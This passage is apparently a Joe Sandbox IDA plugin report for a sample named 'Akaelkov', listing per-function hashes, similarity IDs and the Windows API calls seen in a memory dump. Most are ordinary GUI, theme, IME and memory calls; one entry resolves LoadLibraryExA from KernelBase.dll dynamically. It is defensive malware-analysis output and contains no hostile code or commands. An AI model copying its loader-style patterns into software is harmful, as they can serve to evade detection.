Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 9711488165f6f9e55e6370d5228eb4c6dcd107eca0bc8f5d3348138f1f8277e7
Instruction ID: bedbd152cdc880044116240c4d1b4998f4e26aea818727ba5c774e8ab084455d
Opcode Fuzzy Hash: 9711488165f6f9e55e6370d5228eb4c6dcd107eca0bc8f5d3348138f1f8277e7
Instruction Fuzzy Hash: E6E06DB1E01318DFDF50DE58C9C0AD633E8AB08658F004591AD58DF786D3B0EA248BD6

Uniqueness

Uniqueness Score: -1.00%

Function 04074FA4 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 04074F76

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: baa1517bdadcfa67c0915616b3a2d67137bee1b5e396a356b24dbef79078f2ff
Instruction ID: 738444dc6dd5faa7265f2eb3db6427436ec549d0c4720c8013617698f2983125
Opcode Fuzzy Hash: baa1517bdadcfa67c0915616b3a2d67137bee1b5e396a356b24dbef79078f2ff
Instruction Fuzzy Hash: F5E086B4D002019DEA545A188800A3632B99BD1300F5A855CA401BF1A0DB34B801E63F

Uniqueness

Uniqueness Score: -1.00%

Function 04090274 Relevance: 1.5, APIs: 1, Instructions: 18registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,00000000,?,040902E0,?,?,00000000,0409048C,00000000,00000000,00000000,00000000,00000001,?,00000000,00000000), ref: 0409028E

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: eb308aadd2150d80a81e6751e0f9366a3a2839943b2371eba3ae4dd0f782da46
Instruction ID: 6f86856375de115279165048b99f36e633145fde0d3dea820cbe0af32c5dbb94
Opcode Fuzzy Hash: eb308aadd2150d80a81e6751e0f9366a3a2839943b2371eba3ae4dd0f782da46
Instruction Fuzzy Hash: E0D017B0B002009AEF90EF7588C4B427BDC6F08318B48C8A1D809EF246DA29E8108F21

Uniqueness

Uniqueness Score: -1.00%

Function 04078E04 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,040D062B,ScanString,041069E4,040D7AE0,OpenSession,041069E4,040D7AE0,OpenSession,041069E4,040D7AE0,ScanBuffer,041069E4,040D7AE0,ScanString), ref: 04078E0F

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: f573ade78a336dd4723e6fd7a98d565a78c6aeba897005d26862891ebc9d14c6
Instruction ID: f9e78eba7bfaddfbf6553aa580b147ae4138dac443099129727fb38772304131
Opcode Fuzzy Hash: f573ade78a336dd4723e6fd7a98d565a78c6aeba897005d26862891ebc9d14c6
Instruction Fuzzy Hash: A6C08CA2F116000A2ED0B5FC0DCC49A0AC84A0513D3202F21E42AF31E2D323B0A3241A

Uniqueness

Uniqueness Score: -1.00%

Function 04074F80 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 04074F93

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: f9cf8d993bf6b984c3a206198d86c8bdb50b9fa8060aaea77c6d17370c297a51
Instruction ID: b607092f0584de75f52fab1c7e0a6c334782b2da7173514ef871da06f488ef55
Opcode Fuzzy Hash: f9cf8d993bf6b984c3a206198d86c8bdb50b9fa8060aaea77c6d17370c297a51
Instruction Fuzzy Hash: 0FC012B1E612200BFB719A589CC0B5562DC9B05255F5404A1E504FB350E260B8105356

Uniqueness

Uniqueness Score: -1.00%

Function 04075058 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 04074F76
SysFreeString.OLEAUT32 ref: 04075075

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 478ca0e79f943246b1b3029f9eea381ecbc249769f11debf24d3064ab636df96
Instruction ID: 0231eec19a3b9a80730949016aba5135cc612acbdeebdaeaeca8f38a64921d04
Opcode Fuzzy Hash: 478ca0e79f943246b1b3029f9eea381ecbc249769f11debf24d3064ab636df96
Instruction Fuzzy Hash: F8C0807CD153015DBF042F704904A7E23BC9D81204745445CD911F81D0D524F473742F

Uniqueness

Uniqueness Score: -1.00%

Function 04071668 Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004), ref: 0407167E

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1ab62c1352da55b3199a95ca9e3bc0e99eef7735ffbb70b6ccf4ff8c8de1ea7a
Instruction ID: 57cabf11d2e45f09f0d6fc499d370559c054f6a3ecbff862d045769ae7f25af2
Opcode Fuzzy Hash: 1ab62c1352da55b3199a95ca9e3bc0e99eef7735ffbb70b6ccf4ff8c8de1ea7a
Instruction Fuzzy Hash: 57F04FF0B103008FEB06DF7A9D443417AD2E789388F148179E615EF3C4E7B5A8828B54

Uniqueness

Uniqueness Score: -1.00%

Function 0407171E Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 04071740

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 11bb7cb161738e1202d152692dee8b08c4654f01ea34e12475c26ed5ec337602
Instruction ID: 39d09c24b45fedd5343c1c80a2f1162c6046f035f2db6a874cffdd85db395aee
Opcode Fuzzy Hash: 11bb7cb161738e1202d152692dee8b08c4654f01ea34e12475c26ed5ec337602
Instruction Fuzzy Hash: D2F090F2A006556BE3119F5A9C90B83BB94FB40354F054139EA48AB385D7B5AC40CB95

Uniqueness

Uniqueness Score: -1.00%

Function 04071782 Relevance: 1.3, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000), ref: 040717A0

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: ad0b2965d89ad3b738f0c7f802abc85e5283540e38ae68a199bbfab368737f37
Instruction ID: 0f0ba4ce4f03129c4cce997aee50eb9e14494dc60ea5294ef1644a2faf492bbd
Opcode Fuzzy Hash: ad0b2965d89ad3b738f0c7f802abc85e5283540e38ae68a199bbfab368737f37
Instruction Fuzzy Hash: 29E0DFB17003006EE3201F7E4C80B426AE8EB48664F240665F140EF3C1D2A0FC008766

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 040C319C Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 405COMMON

Download Yara Rule

Strings

vcltest3.dll, xrefs: 040C359D
RegisterAutomation, xrefs: 040C35BE

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID:
String ID: RegisterAutomation$vcltest3.dll
API String ID: 0-2963190186
Opcode ID: 15b6ba138dba5bbc53f79932f4030c42663079d8d7fb9eedc90e01eb2db5b5b4
Instruction ID: aa09106f11e714a03f598462391f900c1af21b8d5949e0c63680e38b46d27383
Opcode Fuzzy Hash: 15b6ba138dba5bbc53f79932f4030c42663079d8d7fb9eedc90e01eb2db5b5b4
Instruction Fuzzy Hash: 12E12935A20204EFEB54EBA8C584A9DB7F1AB04318F14C1ADEC05BB261D734FE44DB45

Uniqueness

Uniqueness Score: -1.00%

Function 040BFCD8 Relevance: 20.0, APIs: 13, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b22c3fee068523151c1f5dfea37b2c8b38549cafc8f3b87b92abfb6f0c62125
Instruction ID: 1e144667208f9b0b69fc87f7aec03ac4e57e3d50173c12426c167823a689272a
Opcode Fuzzy Hash: 2b22c3fee068523151c1f5dfea37b2c8b38549cafc8f3b87b92abfb6f0c62125
Instruction Fuzzy Hash: B1023531A04205EFEB50EBA8C984BED77F5AF04348F1641A4E944FB262D775BE80DB84

Uniqueness

Uniqueness Score: -1.00%

Function 040B224C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 040B225B
GetWindowPlacement.USER32(?,0000002C), ref: 040B2278
GetWindowRect.USER32(?), ref: 040B2291
GetWindowLongA.USER32(?,000000F0), ref: 040B229F
GetWindowLongA.USER32(?,000000F8), ref: 040B22B4
ScreenToClient.USER32(00000000), ref: 040B22C1
ScreenToClient.USER32(00000000,?), ref: 040B22CC

Strings

,, xrefs: 040B2264

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: Window$ClientLongScreen$IconicPlacementRect
String ID: ,
API String ID: 2266315723-3772416878
Opcode ID: 11bc10056f08039989a3272d8451c8fa8ef77ab95f4f623aa4a2d6adde776a4c
Instruction ID: ba9481ebbf413f2b3eee01f3210467544b986be8a4bcdd66c715d1f0f98ab3c2
Opcode Fuzzy Hash: 11bc10056f08039989a3272d8451c8fa8ef77ab95f4f623aa4a2d6adde776a4c
Instruction Fuzzy Hash: 4D113371904301AFDB10EFACC984ACB77D8AF49358F0449A9FE58EB245D735F8048BA6

Uniqueness

Uniqueness Score: -1.00%

Function 040BC508 Relevance: 9.3, APIs: 6, Instructions: 332windowCOMMON

Download Yara Rule

APIs

SetFocus.USER32(00000000), ref: 040BC5CF
SaveDC.GDI32(?), ref: 040BC78D
RestoreDC.GDI32(?,?), ref: 040BC7FE
SaveDC.GDI32(?), ref: 040BC8A1
RestoreDC.GDI32(?,?), ref: 040BC905

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: RestoreSave$Focus
String ID:
API String ID: 1675357626-0
Opcode ID: 47b0aa99627a7821ff5580872e62d4db892a55420c875ea0c0c0911f118a0537
Instruction ID: 395b838c3c272603188b001d0c7d5e057a3c949da0a5c81a24c1854ce04b808f
Opcode Fuzzy Hash: 47b0aa99627a7821ff5580872e62d4db892a55420c875ea0c0c0911f118a0537
Instruction Fuzzy Hash: 36C14B31A042049FFB55DF68C599AEEB7F5EB44304F1584A9E884BB250DB30FE40DB99

Uniqueness

Uniqueness Score: -1.00%

Function 0409B744 Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 266libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(uxtheme.dll,00000000,0409BAF7), ref: 0409B77A
GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0409B792
GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0409B7A4
GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0409B7B6
GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0409B7C8
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0409B7DA
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0409B7EC
GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0409B7FE
GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0409B810
GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0409B822
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0409B834
GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0409B846
GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0409B858
GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0409B86A
GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0409B87C
GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0409B88E
GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0409B8A0
GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0409B8B2
GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0409B8C4
GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0409B8D6
GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0409B8E8
GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0409B8FA
GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0409B90C
GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0409B91E
GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0409B930
GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0409B942
GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0409B954
GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0409B966
GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0409B978
GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0409B98A
GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0409B99C
GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0409B9AE
GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0409B9C0
GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0409B9D2
GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0409B9E4
GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0409B9F6
GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0409BA08
GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0409BA1A
GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0409BA2C
GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0409BA3E
GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0409BA50
GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0409BA62
GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0409BA74
GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0409BA86
GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0409BA98
GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0409BAAA
GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0409BABC
GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0409BACE

Strings

DrawThemeText, xrefs: 0409B7C0
OpenThemeData, xrefs: 0409B78A
DrawThemeIcon, xrefs: 0409B862
GetThemeTextMetrics, xrefs: 0409B81A
GetThemeSysSize, xrefs: 0409B9CA
DrawThemeEdge, xrefs: 0409B850
GetThemeDocumentationProperty, xrefs: 0409BAA2
DrawThemeBackground, xrefs: 0409B7AE
GetThemeFilename, xrefs: 0409B982
IsThemeActive, xrefs: 0409BA12
HitTestThemeBackground, xrefs: 0409B83E
IsThemePartDefined, xrefs: 0409B874
GetThemeInt, xrefs: 0409B8E0
GetThemeIntList, xrefs: 0409B94C
uxtheme.dll, xrefs: 0409B775
GetThemeSysFont, xrefs: 0409B9DC
GetThemePosition, xrefs: 0409B904
GetThemePropertyOrigin, xrefs: 0409B95E
GetThemeBackgroundRegion, xrefs: 0409B82C
GetThemeSysColor, xrefs: 0409B994
GetThemeMargins, xrefs: 0409B93A
GetThemeSysBool, xrefs: 0409B9B8
CloseThemeData, xrefs: 0409B79C
GetThemeBool, xrefs: 0409B8CE
IsAppThemed, xrefs: 0409BA24
GetThemePartSize, xrefs: 0409B7F6
SetThemeAppProperties, xrefs: 0409BA7E
IsThemeDialogTextureEnabled, xrefs: 0409BA5A
GetCurrentThemeName, xrefs: 0409BA90
EnableTheming, xrefs: 0409BAC6
GetWindowTheme, xrefs: 0409BA36
GetThemeEnumValue, xrefs: 0409B8F2
IsThemeBackgroundPartiallyTransparent, xrefs: 0409B886
GetThemeColor, xrefs: 0409B898
GetThemeFont, xrefs: 0409B916
GetThemeBackgroundContentRect, xrefs: 0409B7D2, 0409B7E4
DrawThemeParentBackground, xrefs: 0409BAB4
GetThemeRect, xrefs: 0409B928
GetThemeString, xrefs: 0409B8BC
EnableThemeDialogTexture, xrefs: 0409BA48
GetThemeTextExtent, xrefs: 0409B808
GetThemeSysString, xrefs: 0409B9EE
GetThemeAppProperties, xrefs: 0409BA6C
GetThemeMetric, xrefs: 0409B8AA
SetWindowTheme, xrefs: 0409B970
GetThemeSysColorBrush, xrefs: 0409B9A6
GetThemeSysInt, xrefs: 0409BA00

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
API String ID: 2238633743-2910565190
Opcode ID: 2aae355981d072013faf026893cae698422ffa71f2b204bf1bf141f5b788abbc
Instruction ID: 1cd3a63602537b89e73cc3b787790cfd48b7f312380567eaf8cfbb5d9b121b17
Opcode Fuzzy Hash: 2aae355981d072013faf026893cae698422ffa71f2b204bf1bf141f5b788abbc
Instruction Fuzzy Hash: 54A1FBB0A40B50AFEF00EB65A8C5AA537F8FB167683100964A415EF205D6B9FCC8DF16

Uniqueness

Uniqueness Score: -1.00%

Function 040B7028 Relevance: 49.1, APIs: 15, Strings: 13, Instructions: 95libraryloaderCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008000), ref: 040B7041
GetModuleHandleA.KERNEL32(USER32,00000000,040B718E,?,00008000), ref: 040B7065
GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 040B7072
LoadLibraryA.KERNEL32(imm32.dll,00000000,040B718E,?,00008000), ref: 040B708E
GetProcAddress.KERNEL32(040DB54C,ImmGetContext), ref: 040B70B0
GetProcAddress.KERNEL32(040DB54C,ImmReleaseContext), ref: 040B70C5
GetProcAddress.KERNEL32(040DB54C,ImmGetConversionStatus), ref: 040B70DA
GetProcAddress.KERNEL32(040DB54C,ImmSetConversionStatus), ref: 040B70EF
GetProcAddress.KERNEL32(040DB54C,ImmSetOpenStatus), ref: 040B7104
GetProcAddress.KERNEL32(040DB54C,ImmSetCompositionWindow), ref: 040B7119
GetProcAddress.KERNEL32(040DB54C,ImmSetCompositionFontA), ref: 040B712E
GetProcAddress.KERNEL32(040DB54C,ImmGetCompositionStringA), ref: 040B7143
GetProcAddress.KERNEL32(040DB54C,ImmIsIME), ref: 040B7158
GetProcAddress.KERNEL32(040DB54C,ImmNotifyIME), ref: 040B716D
SetErrorMode.KERNEL32(?,040B7195,00008000), ref: 040B7188

Strings

WINNLSEnableIME, xrefs: 040B706C
ImmGetCompositionStringA, xrefs: 040B7138
ImmGetContext, xrefs: 040B70A5
ImmSetOpenStatus, xrefs: 040B70F9
ImmIsIME, xrefs: 040B714D
USER32, xrefs: 040B7060
ImmGetConversionStatus, xrefs: 040B70CF
ImmReleaseContext, xrefs: 040B70BA
imm32.dll, xrefs: 040B7089
ImmSetCompositionWindow, xrefs: 040B710E
ImmSetCompositionFontA, xrefs: 040B7123
ImmSetConversionStatus, xrefs: 040B70E4
ImmNotifyIME, xrefs: 040B7162

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
String ID: ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME$imm32.dll
API String ID: 3397921170-3950384806
Opcode ID: 0fa902d7d005af0ad9305302bcb740b739803a965496e0143390881fa8438c05
Instruction ID: 614be598a66a9f9e8f5aecb9ba77b91cde1175e5e5fff680455636f46d390c74
Opcode Fuzzy Hash: 0fa902d7d005af0ad9305302bcb740b739803a965496e0143390881fa8438c05
Instruction Fuzzy Hash: CD3165B0941740AFEB00EFB59845BA537F8E785318B118825F545BB200DABE7CC8CF69

Uniqueness

Uniqueness Score: -1.00%

Function 040936B0 Relevance: 22.7, APIs: 15, Instructions: 245windowCOMMON

Download Yara Rule

APIs

SelectObject.GDI32(?,?), ref: 04093708
SelectObject.GDI32(?,?), ref: 04093766
DeleteObject.GDI32(?), ref: 04093772
SelectObject.GDI32(?,?), ref: 040937BC
StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0409383B
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 0409385D
SetTextColor.GDI32(?,00000000), ref: 04093865
SetBkColor.GDI32(?,00FFFFFF), ref: 04093873
StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 0409389F
StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 040938C4
SetTextColor.GDI32(?,?), ref: 040938CE
SetBkColor.GDI32(?,?), ref: 040938D8
SelectObject.GDI32(?,00000000), ref: 040938EB
DeleteObject.GDI32(?), ref: 040938F4
DeleteDC.GDI32(?), ref: 0409391F

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: Object$ColorSelectStretch$Delete$Text
String ID:
API String ID: 516469703-0
Opcode ID: 12dbf6f1f9777930a51faa89a9ac9ed8cebc551ecc3ceea0b0d40b71524f6b7c
Instruction ID: 4229d6fb1e9d77b4c56abaa64ce6de6c1120821452e4c4f81bd6dd8e9f4cbb8d
Opcode Fuzzy Hash: 12dbf6f1f9777930a51faa89a9ac9ed8cebc551ecc3ceea0b0d40b71524f6b7c
Instruction Fuzzy Hash: E38171B1A00609AFDB50DEA8CD85EEF7BFCEB0C618F114954BA19F7240C636AD008B65

Uniqueness

Uniqueness Score: -1.00%

Function 040B2D88 Relevance: 21.3, APIs: 14, Instructions: 258COMMON

Download Yara Rule

APIs

GetClientRect.USER32(00000000,?), ref: 040B2DDF
GetWindowRect.USER32(00000000,?), ref: 040B2DF1
MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 040B2E07
OffsetRect.USER32(?,?,?), ref: 040B2E1C
ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 040B2E35
InflateRect.USER32(?,00000000,00000000), ref: 040B2E53
GetWindowLongA.USER32(00000000,000000F0), ref: 040B2E6D
DrawEdge.USER32(?,?,?,00000008), ref: 040B2F6C
IntersectClipRect.GDI32(?,?,?,?,?), ref: 040B2F85
OffsetRect.USER32(?,?,?), ref: 040B2FAF
MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 040B2FD4
IntersectRect.USER32(?,?,?), ref: 040B2FE5
OffsetRect.USER32(?,?,?), ref: 040B2FFA
FillRect.USER32(?,?,00000000), ref: 040B3016

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: Rect$Window$Offset$ClipIntersectPoints$ClientDrawEdgeExcludeFillInflateLong
String ID:
API String ID: 1904870186-0
Opcode ID: 2169caa93945796c5fcda82f54b476e6a1f0f8ebf87eca8a557d41760cb607fb
Instruction ID: 0fdd576144aca0a4fac3316156d071952f4e6b296aa7ea7094d202f66bd3db63
Opcode Fuzzy Hash: 2169caa93945796c5fcda82f54b476e6a1f0f8ebf87eca8a557d41760cb607fb
Instruction Fuzzy Hash: 4CA12771E00208AFDB41DBA8C895EEEB3F9AF09308F1440A5E955FB251C775BE05DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 040725CC Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 0407296A

Strings

An unexpected memory leak has occurred. , xrefs: 0407272C
bytes: , xrefs: 040727F9
String, xrefs: 0407283D
Unexpected Memory Leak, xrefs: 0407295C
7, xrefs: 0407273D
The sizes of unexpected leaked medium and large blocks are: , xrefs: 040728E5
, xrefs: 040728B0
Unknown, xrefs: 04072828
The unexpected small block leaks are:, xrefs: 040727A3

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: Message
String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
API String ID: 2030045667-32948583
Opcode ID: a2649c7b47622ef705ecf264724be661fb8dd1e976cdaeb540181c3fff500f1f
Instruction ID: b4421313da8e8cdc3646cb2bb79fbec986b59fac44e8b77fe48c0bbac0e203d6
Opcode Fuzzy Hash: a2649c7b47622ef705ecf264724be661fb8dd1e976cdaeb540181c3fff500f1f
Instruction Fuzzy Hash: BBA1D630E042548BEF21AA2CC8C4BD876E4FB09758F1441EDE549BB342DB75A9C6CB5B

Uniqueness

Uniqueness Score: -1.00%

Function 040C8CE4 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 102libraryloaderCOMMON

Download Yara Rule

APIs

IsBadHugeReadPtr.KERNEL32(?,00000004), ref: 040C8D04
GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 040C8D1B
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll), ref: 040C8D21
IsBadHugeReadPtr.KERNEL32(?,00000004), ref: 040C8DAF
IsBadHugeReadPtr.KERNEL32(?,00000002), ref: 040C8DBB
IsBadHugeReadPtr.KERNEL32(?,00000014), ref: 040C8DCF

Strings

C:\Windows\System32\KernelBase.dll, xrefs: 040C8D16
LoadLibraryExA, xrefs: 040C8D11

Memory Dump Source

